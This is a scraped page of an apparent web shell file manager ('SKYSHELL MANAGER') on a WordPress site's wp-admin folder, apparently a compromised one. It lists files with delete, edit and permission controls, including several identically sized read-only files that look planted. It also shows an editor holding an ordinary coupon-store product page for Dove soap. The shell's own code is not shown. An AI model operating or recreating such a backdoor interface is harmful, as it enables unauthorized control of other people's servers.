📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dove.php
<!DOCTYPE html> <html> <head> <link rel="shortcut icon" href="images/fav.png" /> <title>Dove Original Beauty Cream - Trends Coupon</title> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" /> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="js/jquery.min.js"></script> <!-- Custom Theme files --> <!--theme-style--> <link href="css/style.css" rel="stylesheet" type="text/css" media="all" /> <!--//theme-style--> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Trends Coupon coupns, coupon deals,Retail things" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!--fonts--> <link href='http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Vollkorn:400,700' rel='stylesheet' type='text/css'> <!--//fonts--> <script type="text/javascript" src="js/move-top.js"></script> <script type="text/javascript" src="js/easing.js"></script> <script type="text/javascript"> jQuery(document).ready(function($) { $(".scroll").click(function(event){ event.preventDefault(); $('html,body').animate({scrollTop:$(this.hash).offset().top},1000); }); }); </script> </head> <body> <!--header--> <div class="header"> <div class="container"> <!----> <div class="logo"> <a href="index.php"><img src="images/logo3.png" alt="" style="width:75%;margin-top:-4%"></a> </div> <div class="header-right"> <div class="header-bottom"> <div class="top-nav"> <span class="menu"> </span> <ul> <li><a href="index.php">HOME</a> </li> <li><a href="about.php" > ABOUT US</a></li> <li class="active"><a href="product.php" > PRODUCTS</a></li> <li><a href="contact.php" > CONTACT US </a></li> <li><a href="subscribe.php">SUBSCRIBE </a></li> </ul> <!--script--> <script> $("span.menu").click(function(){ $(".top-nav ul").slideToggle(500, function(){ }); }); </script> </div> <a href="#" class="cart">+(501)503-5972</a> <div class="clearfix"> </div> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <!----> <div class="content"> <div class="container"> <!--- <div class="content-nestle" style="margin-top:3%;height:400px;"> <div> <h2 style="text-align:center;padding-top:15%;color:#FF1573;font-size:45px; text-shadow: 2px 2px yellow;">Products</h2> </div> <div class="clearfix"> </div> </div> <!----> <div class="content-bottom" style="margin-top:5%"> <nav class="breadcrumbs-container" aria-label="Breadcrumbs"> <a href="index.php"><b>Home</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <a href="health.php" title=""><b>Health & Beauty</b></a> <span class="breadcrumbs-delimiter" aria-hidden="true"> <svg aria-hidden="true" focusable="false" role="presentation" xmlns="http://www.w3.org/2000/svg" width="8" height="5" viewBox="0 0 8 5"> <path fill="currentColor" fill-rule="evenodd" d="M1.002.27L.29.982l3.712 3.712L7.714.982 7.002.27l-3 3z"></path> </svg> </span> <span>Dove Original Beauty Cream Bar 4 x 100g </span> </nav><br> <div class="prod-det"> <div class="prod-left" style="width:45%"> <img src="images/health/dove.JPG" title="" alt""/ style="width:80%"> </div> <div class="prod-right"> <h3>Dove Original Beauty Cream Bar 4 x 100g </h3><br> <h3>$4.941500 USD </h3> <div class="product-description rte" data-product-description=""> <div><strong>Get Next-day Delivery. <br><br></strong></div> <div></div> <div style="margin-bottom:20px;"><strong>Buy Pack of 4 x 100g Dove Original Beauty Cream Bar.</strong></div> <ul style="line-height:35px;"> <li>Dove bar soap doesn't dry skin like soap can</li> <li>1/4 moisturising cream and mild cleansers help skin retain moisture</li> <li>Leaves skin softer, smoother and healthier looking</li> <li>A cream bar and soap bars suitable for everyday use on the face, body and hands</li> <li>Classic moisturising formula</li> <li>Dove isn't a liquid soap, it's a beauty bar</li> </ul> <p><strong>Product Marketing</strong> For skin that's soft and smooth, turn to the Dove beauty bar soap. With ¼ moisturizing cream, it goes beyond cleansing, nourishing as it washes away the day… The secret to beautiful skin is moisture, and no other hand soap hydrates skin better than Dove. That’s because Dove isn’t a bar soap, it’s a Beauty Bar. While ordinary soaps can strip skin of essential nutrients, Dove beauty bar has mild cleansers to care for skin as it cleans. With our ¼ moisturizing cream, Dove Beauty Bar leaves your face and body feeling soft, smooth, and more radiant than ordinary soap. You can see why we call it a beauty bar. Dove Original Beauty Cream Bar Soap combines a gentle cleansing formula with Dove's signature ¼ moisturizing cream to give you softer, smoother, healthier-looking skin. The mild cleansers help your skin to retain its natural moisture rather than strip it away. This Dove Soap Bar even helps to replenish nutrients that are lost during the cleansing process. Where a regular liquid soap bar might leave your skin feeling dry and tight, a Dove Beauty Cream Bar Soap leaves it feeling soft and smooth. It's not a liquid soap - it's a beauty bar. Washing with regular soap can cause skin to feel dry, tight and irritated as some cleansing ingredients strip skin of essential nutrients. What makes Dove different? Its gentle cleansers help your skin retain its natural moisture and its mild formula is kind to your skin. For best results: Lather up your Dove Beauty Bar Soap and massage the smooth, creamy lather over your face and body before rinsing thoroughly. For soft, smooth hands, you can also enjoy regular hand-washing throughout the day with your Dove bar. Soap may dry out your hands, but the classic moisturizing formula of Dove bars will leave skin softer, smoother and healthier-looking.</p> <p><strong>Ingredients</strong> Sodium Lauroyl Isethionate, Stearic Acid, Sodium Palmitate, Lauric Acid, Aqua, Sodium Isethionate, Sodium Stearate, Cocamidopropyl Betaine, Sodium Palm Kernelate, Glycerin, Parfum, Sodium chloride, Zinc Oxide, Tetrasodium EDTA, Tetrasodium Etidronate, Alumina, Alpha-Isomethyl Ionone, Benzyl alcohol, Butylphenyl Methylpropional, Citronellol, Coumarin, Hexyl Cinnamal, Limonene, Linalool, CI 77891</p> <p><strong>Preparation and Usage</strong> Caution: use only as directed. Avoid contact with eyes. If eye contact occurs wash out immediately with warm water. If irritation occurs discontinue use</p> <p><strong>Safety</strong> Caution: if product gets in your eyes, rinse them with warm water. Avoid eyes and other sensitive areas. As we are always looking to improve our products, our formulations change from time to time, so please always check the product packaging before use</p> <!--<p><strong>Manufacturer’s Address</strong> Unilever Dept ER, Wirral CH63 3JW UK</p>--> <p><strong>Product Disclaimer</strong> <br>At <b>Trends Coupon.com</b>, we work to ensure that product information on our website is correct, manufacturers may alter their product information, packaging, ingredients, nutritional guides and allergy advice so you may occasionally see a change or difference in products. Please be aware that <b>Trends Coupon.com</b> are not the manufacturer of the products sold on our website. Actual product packaging and materials may contain more or other different information than shown on our website. If you have any specific product queries, please contact the manufacturer. We recommend that you always read the label carefully before using or consuming any products including medicinal products. Please do not solely rely on the information provided on our <b>Trends Coupon.com</b> website and therefore we are unable to accept liability for any inaccuracies or incorrect information contained or presented on our website.</p> </div> </div> <div class="clearfix"> </div> </div> </div> <!----> <div class="grid-top-in"> <div class="grid-top"> <div class="col-md-4 top-grid "> <h5>ABOUT Trends Coupon.</h5> <p class="sed">"Trends Coupon"has become the leading online Retail store offering the widest variety of consumer products. Find everything from Retail, household cleaning products, health and beauty supplies, baby products, pet food and much more. Now the speed of online shopping, the convenience of fast delivery and the value of discount mercury can be yours from the comfort of your own home!.</p> </div> <div class="col-md-4 top-grid"> <h5>INFORMATION</h5> <ul class="social-in"> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Confditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> <div class="clearfix"> </div> </div> <div class="col-md-4 top-grid"> <h5>NEWSLETTER:</h5> <p class="nospace btmspace-15" style="margin-bottom:15px;">For weekly new updates </p> <form method="post" action="#"> <fieldset> <input class="btmspace-15" type="text" value="" placeholder="Name" style="margin-bottom:15px;width: 250px;"><br> <input class="btmspace-15" type="text" value="" placeholder="Email" style="margin-bottom:15px;width: 250px;"><br> <button type="submit" value="submit">Submit</button> </fieldset> </form> </div> <div class="clearfix"> </div> </div> </div> </div> </div> <!----> <div class="footer"> <div class="container"> <p class="footer-grid">Copyright © 2023. All Rights Reserved.</p> </div> <script type="text/javascript"> $(document).ready(function() { /* var defaults = { containerID: 'toTop', // fading element id containerHoverID: 'toTopHover', // fading element hover id scrollSpeed: 1200, easingType: 'linear' }; */ $().UItoTop({ easingType: 'easeOutQuart' }); }); </script> <a href="#" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a> </div> </body> </html>>
Save